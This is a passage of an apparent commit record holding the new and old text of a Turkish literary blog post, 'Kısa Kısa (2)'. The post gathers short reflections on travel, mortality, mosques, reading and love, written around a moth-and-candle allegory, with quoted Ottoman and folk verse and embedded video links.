gibi...\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBir dua, Kays'\u0131n dilinden g\u00f6nl\u00fcme d\u00fc\u015fer: +\n_\"Gittik\u00e7e h\u00fcsn\u00fcn eyle ziy\u00e2de nig\u00e2r\u0131m\u0131n_ +\n_Geldik\u00e7e derdine beter et m\u00fcptel\u00e2 beni\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n-_Neden kendi c\u00fcmlelerinle konu\u015fmazs\u0131n?_ +\n-Bu h\u00e2l, akl\u0131m\u0131 setr ederken ben nas\u0131l konu\u015fay\u0131m? +\n-_Peki niye kendine s\u00f6zc\u00fcler bulursun, onlar\u0131n diliyle s\u00f6ylersin?_ +\n-Dilim kendi g\u00f6nl\u00fcmden konu\u015fsa bu ate\u015f ya\u015f yaprak m\u0131 b\u0131rak\u0131r? +\n-_Peki niye susmazs\u0131n?_ +\n-\u0130\u00e7im ile durmadan s\u00f6yle\u015firken nas\u0131l susay\u0131m? +\n-_Haberdar oldu\u011funa delilin var m\u0131d\u0131r?_ +\n-Bir ay, ayd\u0131nl\u0131\u011f\u0131n\u0131n d\u00fc\u015ft\u00fc\u011f\u00fc g\u00f6n\u00fclden big\u00e2ne midir? +\n-_Ne vakte kadar inilersin?_ +\n-Vaktin varl\u0131\u011f\u0131ndan s\u0131yr\u0131lmadan tamam olunur mu? +\n-_Neyi beklersin?_ +\n-Pervane, \u015fem tutu\u015fmadan ne yaps\u0131n? Bekledi\u011fim \u015feminden bir \u0131\u015f\u0131kt\u0131r.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::asqjpUOo3YE[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nUyutmayan sebep, sen ne g\u00fczelsin! \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYa Karacao\u011flan halim ortadad\u0131r, h\u00e2l\u00e2 uyand\u0131rmaz m\u0131? +\n_\"Perv\u00e2ne \u015fem\u2019ini uyand\u0131ramaz_ +\n_Ba\u015fta sevd\u00e2 kalpte n\u00e2r olmay\u0131nca\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00dcmit ve sab\u0131r, iki karde\u015f. Birbirlerine ne g\u00fczel sar\u0131l\u0131yor \u015fimdi. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00d6yle sermestim ki ne i\u015f ne yolculuk ne okul ne de s\u0131navdan bir yorgunluk hissediyorum. Nas\u0131l sermest olmayay\u0131m ki muhatap alm\u0131\u015fken bu bendeyi? \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00dcfleyiverdi y\u00e2reme \u015fifa deyu ol mehlik\u00e2 +\nAmma c\u00fb\u015fa getirdi i\u00e7re ate\u015fi bilmedi\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nAcemice, belki hadsizce. Dilime dolanmadan kelimeler s\u00f6ylemek kolay de\u011fil. +\nG\u00fcn do\u011fmas\u0131n pencereme ne olur, gecemi ayd\u0131nlatan ay yeter. +\n_Bir nefeslik lafz\u0131mda zikrime c\u00e2nan d\u00fc\u015fer_\n\nvideo::244526490[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nPervaneyi bir vesvese tutmu\u015f, ka\u00e7 gecedir uyumaz beni de uyutmaz. \"S\u00f6ylediklerimle \u015femi \u00fczer miyim?\", diye kara kara d\u00fc\u015f\u00fcn\u00fcr. \"Acaba \u015fem pervanenin varl\u0131\u011f\u0131ndan ho\u015fnut mudur?\" Teselli verdim, ikna etmeye kalk\u0131\u015ft\u0131m. K\u00e2r etmedi. Ne diyeyim, nas\u0131l edeyim? +\n*Pervane kendi acizli\u011fine hatalar\u0131na bak\u0131p vesveseye d\u00fc\u015ferdi. \u015eem \u00fcz\u00fclmesin; pervane tevekk\u00fcl ipine sar\u0131ld\u0131, \u00f6ylece uyudu.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nPervanenin benden ba\u015fka s\u0131rda\u015f\u0131 yok, kime anlats\u0131n halini? Kime d\u00f6ks\u00fcn i\u00e7ini? Ak\u0131tacak g\u00f6z\u00fcnden ya\u015flar\u0131 ama onlar\u0131n s\u0131rr\u0131n\u0131 if\u015fa edece\u011finden \u00e7ekinir. G\u00f6zya\u015flar\u0131n\u0131 da i\u00e7inde saklar.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u015eem'i \u00fczerlermi\u015f, yorgun b\u0131rak\u0131rlarm\u0131\u015f galiba. Be vefas\u0131z Pervane sen de durmaz kendi derdinden s\u00f6ylersin! \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u015eeyh Galib'in duas\u0131na \"Amin!\" deriz. \n\n_\"Y\u00e2resi muht\u00e2c-\u0131 k\u00e2f\u00fbr olmas\u0131n bir kimsenin_ +\n_S\u00eeneden mehp\u00e2resi d\u00fbr olmas\u0131n bir kimsenin\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::nQh3bOwTnMg[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nEn \u00e7ok yolculuklar d\u00fc\u015f\u00fcnd\u00fcr\u00fcr insana, akl\u0131na gelmeyenler yakalar karanl\u0131\u011f\u0131n ve \u0131ss\u0131zl\u0131\u011f\u0131n ortas\u0131nda.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nDilimde dua: \n\"Hata etmekten koru, us\u00fbls\u00fcz vusulden sana s\u0131\u011f\u0131nd\u0131k. Cahile yol g\u00f6ster.\" \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYazmal\u0131 m\u0131y\u0131m s\u00e2hiden? Sanki yazamad\u0131klar\u0131m\u0131 da g\u00f6nl\u00fcmden okursun. Oku ki kalks\u0131n sanc\u0131s\u0131 \u00fczerimden.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nUtana s\u0131k\u0131la, incitmekten korkarak...\n\nvideo::245933662[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n","old_contents":"= K\u0131sa K\u0131sa (2)\n:hp-tags:\n\nBir s\u00fcredir haftada bir yapt\u0131\u011f\u0131m yolculuklarda fark\u0131na vard\u0131m ki her yolculuk bana \u00f6l\u00fcm\u00fc ciddi anlamda hat\u0131rlat\u0131yor. G\u00fcnl\u00fck ya\u015fant\u0131da mezarl\u0131k duvarlar\u0131n\u0131n arkas\u0131na silkeledi\u011fim(iz) bu ger\u00e7e\u011fi hat\u0131rlamama vesile oluyor yolculuklar. Her yolculuk bunu az veya \u00e7ok bir \u015fekilde y\u00e2d\u0131ma d\u00fc\u015f\u00fcr\u00fcyormu\u015f asl\u0131nda yeni farkettim. Neden sorusu bu sezi\u015fin pe\u015fine tak\u0131ld\u0131 hemencecik. \u0130lk akl\u0131ma gelen cevap \u015fu oldu: \"\u00d6l\u00fcm de bir yolculuktur neticede. Bu k\u0131sa yolculuklar o b\u00fcy\u00fck yolculu\u011fun bir musaggaras\u0131d\u0131r.\" Bir de \u015f\u00f6yle tartt\u0131m kendimi: \"Yoksa geri d\u00f6nememek korkusu mu bu ya\u015fad\u0131\u011f\u0131n?\", \"\u00d6l\u00fcm\u00fc de geri d\u00f6n\u00fc\u015f\u00fc olmayan bir gidi\u015f olarak g\u00f6r\u00fcyorsun da D\u00fcnya'ya d\u00fc\u015fk\u00fcnl\u00fc\u011f\u00fcn m\u00fc akl\u0131na getiriyor onu?\" Terazinin iki kefesine iki d\u00fc\u015f\u00fcnceyi de b\u0131rakt\u0131m, tahterevallide oynayan \u00e7ocuklar gibi hangileri a\u015fa\u011f\u0131da hangileri yukar\u0131da g\u00f6remedim.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBu yolculuklar\u0131n bitiminde kendimi bir arkada\u015f\u0131n kuca\u011f\u0131na b\u0131rak\u0131verdim. Birka\u00e7 ayd\u0131r uzak kald\u0131\u011f\u0131m, avlusunda kedilerin ko\u015fturmacas\u0131na dald\u0131\u011f\u0131m \u00dcsk\u00fcdar Mihrimah Sultan Cami\u00ee'nden ba\u015fka bir yer de\u011fildi. Her seferinde uzaktan g\u00fcl-endam\u0131n\u0131 seyredip biraz \u00f6zlem biraz sevin\u00e7le yol al\u0131yorum ona do\u011fru. Gece en siyah \u00e7ar\u015faf\u0131 \u00f6rterken g\u00f6ky\u00fcz\u00fcne avlusuna ayak bas\u0131yorum, Valide Sultan Cami\u00ee ile s\u00f6yle\u015fmeye ba\u015fl\u0131yor iki dost. B\u00f6lm\u00fcyorum onlar\u0131, dinliyorum bir yandan \u015fad\u0131rvandan akan sular\u0131n sesi. G\u00fcne\u015f utanga\u00e7l\u0131\u011f\u0131n\u0131 k\u0131z\u0131ll\u0131klar\u0131n ard\u0131nda b\u0131rakarak g\u00f6steriyor kendini. Bir ba\u015fka dostu g\u00f6r\u00fcyorum, uzak kalman\u0131n \u0131rak edemedi\u011fi bir dostu. Sonra diyorum: \"Dostu g\u00f6rmek, bayramd\u0131r.\"\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYolculuk, okul, i\u015f derken bir yo\u011funluk kapl\u0131yor d\u00f6rt yan\u0131m\u0131. Yapaca\u011f\u0131m i\u015flerin, g\u00f6revlerin vs. zihnimi me\u015fgul etmesi san\u0131r\u0131m daha yorucu oluyor. Bu yo\u011funluk i\u00e7erisinde bir yaz\u0131y\u0131 okumak i\u00e7in zaman kollamaya \u00e7al\u0131\u015f\u0131yordum, bir t\u00fcrl\u00fc nasip olmuyordu. Okudu\u011fum zaman normalde alamayaca\u011f\u0131m bir keyfi ald\u0131m. San\u0131r\u0131m okumak i\u00e7in g\u00f6sterdi\u011fim i\u015ftiyak kitapla\/yaz\u0131yla aramda bir ba\u011f olu\u015fmas\u0131na vesile oluyor. Ayn\u0131 durum ruhen, zihnen yo\u011fun oldu\u011fum veya kendimi yaln\u0131z hissetti\u011fim -y\u0131llard\u0131r tek ya\u015famama ra\u011fmen yaln\u0131z hissetti\u011fim zamanlar, kalabal\u0131klar i\u00e7indeki yaln\u0131zl\u0131\u011f\u0131mdan az- anlarda yine ortaya \u00e7\u0131k\u0131yor. Roman\u0131n bir kahraman\u0131 omzuma dokunuyor, bir di\u011feri elini uzat\u0131yor, \u00f6b\u00fcr\u00fc g\u00fcl\u00fcms\u00fcyor. Buna en iyi \u00f6rnek _Nisan'\u0131n 2 G\u00fcn\u00fc_, basit ve yal\u0131n bir anlat\u0131m\u0131 olsa da i\u00e7inde yer buldu\u011fum bir romand\u0131. Birka\u00e7 y\u0131l \u00f6nce okul k\u00fct\u00fcphanesinde denk gelip \u00f6d\u00fcn\u00e7 alm\u0131\u015ft\u0131m. Bir k\u0131\u015f g\u00fcn\u00fc s\u0131rt\u0131m\u0131 pete\u011fe dayay\u0131p okudu\u011fumu hat\u0131rl\u0131yorum. Petek siperin bir cephesi olmu\u015ftu, ayaklar\u0131m\u0131n siperin di\u011fer cephesine de\u011fdi\u011fini hissediyordum. Kabzas\u0131 ayaklar\u0131m\u0131n ucunda bir t\u00fcfek omzuma yaslanm\u0131\u015ft\u0131.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u0130yi insan tan\u0131yorum, ke\u015fke daha \u00f6nce tan\u0131sayd\u0131m diyorum. Ve ke\u015fkeye \u00f6yle bir duygu ve vurgu y\u00fckl\u00fcyorum ki takat getiremiyor, eziliyor. Bir mahr\u00fb -g\u00fczel tavr\u0131 ay gibi parl\u0131yor- bed\u00e2yi-\u00e2\u015fin\u00e2 (bed\u00e2yi-\u015finas) nas\u0131l olunur \u00f6\u011fretiyor. Ben ne kadar \u00f6\u011frenebilirim bilmiyorum. Bir daha *ke\u015fke*... \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nCevdet Pa\u015fa'n\u0131n eli omzuma dokundu.\n\n_Nas\u0131l \u00e7\u0131ld\u0131rmad\u0131m hayretdeyim h\u00e2l\u00e2 sevincimden_ +\n_Lis\u00e2n\u0131ndan seni sevdim s\u00f6z\u00fcn g\u00fb\u015f itdi\u011fim demler_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nG\u00f6kte ay, parl\u0131yor; ay\u0131n on d\u00f6rd\u00fcd\u00fcr. \n\n_Sana vard\u0131r y\u00fcre\u011fimde s\u00f6zlerim_\n\nvideo::So6VlDiHukI[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nDede Efendi ne dersin b\u00f6yle?\n\nvideo::vvFUnXpoUSE[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"Anlat\u0131yorum, hi\u00e7 konu\u015fmadan,_ +\n_Bu\u011fday\u0131n i\u00e7ini d\u00f6kmesi gibi...\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBir dua, Kays'\u0131n dilinden g\u00f6nl\u00fcme d\u00fc\u015fer: +\n_\"Gittik\u00e7e h\u00fcsn\u00fcn eyle ziy\u00e2de nig\u00e2r\u0131m\u0131n_ +\n_Geldik\u00e7e derdine beter et m\u00fcptel\u00e2 beni\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n-_Neden kendi c\u00fcmlelerinle konu\u015fmazs\u0131n?_ +\n-Bu h\u00e2l, akl\u0131m\u0131 setr ederken ben nas\u0131l konu\u015fay\u0131m? +\n-_Peki niye kendine s\u00f6zc\u00fcler bulursun, onlar\u0131n diliyle s\u00f6ylersin?_ +\n-Dilim kendi g\u00f6nl\u00fcmden konu\u015fsa bu ate\u015f ya\u015f yaprak m\u0131 b\u0131rak\u0131r? +\n-_Peki niye susmazs\u0131n?_ +\n-\u0130\u00e7im ile durmadan s\u00f6yle\u015firken nas\u0131l susay\u0131m? +\n-_Haberdar oldu\u011funa delilin var m\u0131d\u0131r?_ +\n-Bir ay, ayd\u0131nl\u0131\u011f\u0131n\u0131n d\u00fc\u015ft\u00fc\u011f\u00fc g\u00f6n\u00fclden big\u00e2ne midir? +\n-_Ne vakte kadar inilersin?_ +\n-Vaktin varl\u0131\u011f\u0131ndan s\u0131yr\u0131lmadan tamam olunur mu? +\n-_Neyi beklersin?_ +\n-Pervane, \u015fem tutu\u015fmadan ne yaps\u0131n? Bekledi\u011fim \u015feminden bir \u0131\u015f\u0131kt\u0131r.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::asqjpUOo3YE[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nUyutmayan sebep, sen ne g\u00fczelsin! \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYa Karacao\u011flan halim ortadad\u0131r, h\u00e2l\u00e2 uyand\u0131rmaz m\u0131? +\n_\"Perv\u00e2ne \u015fem\u2019ini uyand\u0131ramaz_ +\n_Ba\u015fta sevd\u00e2 kalpte n\u00e2r olmay\u0131nca\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00dcmit ve sab\u0131r, iki karde\u015f. Birbirlerine ne g\u00fczel sar\u0131l\u0131yor \u015fimdi. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00d6yle sermestim ki ne i\u015f ne yolculuk ne okul ne de s\u0131navdan bir yorgunluk hissediyorum. Nas\u0131l sermest olmayay\u0131m ki muhatap alm\u0131\u015fken bu bendeyi? \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00dcfleyiverdi y\u00e2reme \u015fifa deyu ol mehlik\u00e2 +\nAmma c\u00fb\u015fa getirdi i\u00e7re ate\u015fi bilmedi\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nAcemice, belki hadsizce. Dilime dolanmadan kelimeler s\u00f6ylemek kolay de\u011fil. +\nG\u00fcn do\u011fmas\u0131n pencereme ne olur, gecemi ayd\u0131nlatan ay yeter. +\n_Bir nefeslik lafz\u0131mda zikrime c\u00e2nan d\u00fc\u015fer_\n\nvideo::244526490[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nPervaneyi bir vesvese tutmu\u015f, ka\u00e7 gecedir uyumaz beni de uyutmaz. \"S\u00f6ylediklerimle \u015femi \u00fczer miyim?\", diye kara kara d\u00fc\u015f\u00fcn\u00fcr. \"Acaba \u015fem pervanenin varl\u0131\u011f\u0131ndan ho\u015fnut mudur?\" Teselli verdim, ikna etmeye kalk\u0131\u015ft\u0131m. K\u00e2r etmedi. Ne diyeyim, nas\u0131l edeyim? +\n*Pervane kendi acizli\u011fine hatalar\u0131na bak\u0131p vesveseye d\u00fc\u015ferdi. \u015eem \u00fcz\u00fclmesin; pervane tevekk\u00fcl ipine sar\u0131ld\u0131, \u00f6ylece uyudu.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nPervanenin benden ba\u015fka s\u0131rda\u015f\u0131 yok, kime anlats\u0131n halini? Kime d\u00f6ks\u00fcn i\u00e7ini? Ak\u0131tacak g\u00f6z\u00fcnden ya\u015flar\u0131 ama onlar\u0131n s\u0131rr\u0131n\u0131 if\u015fa edece\u011finden \u00e7ekinir. G\u00f6zya\u015flar\u0131n\u0131 da i\u00e7inde saklar.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u015eem'i \u00fczerlermi\u015f, yorgun b\u0131rak\u0131rlarm\u0131\u015f galiba. Be vefas\u0131z Pervane sen de durmaz kendi derdinden s\u00f6ylersin! \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u015eeyh Galib'in duas\u0131na \"Amin!\" deriz. \n\n_\"Y\u00e2resi muht\u00e2c-\u0131 k\u00e2f\u00fbr olmas\u0131n bir kimsenin_ +\n_S\u00eeneden mehp\u00e2resi d\u00fbr olmas\u0131n bir 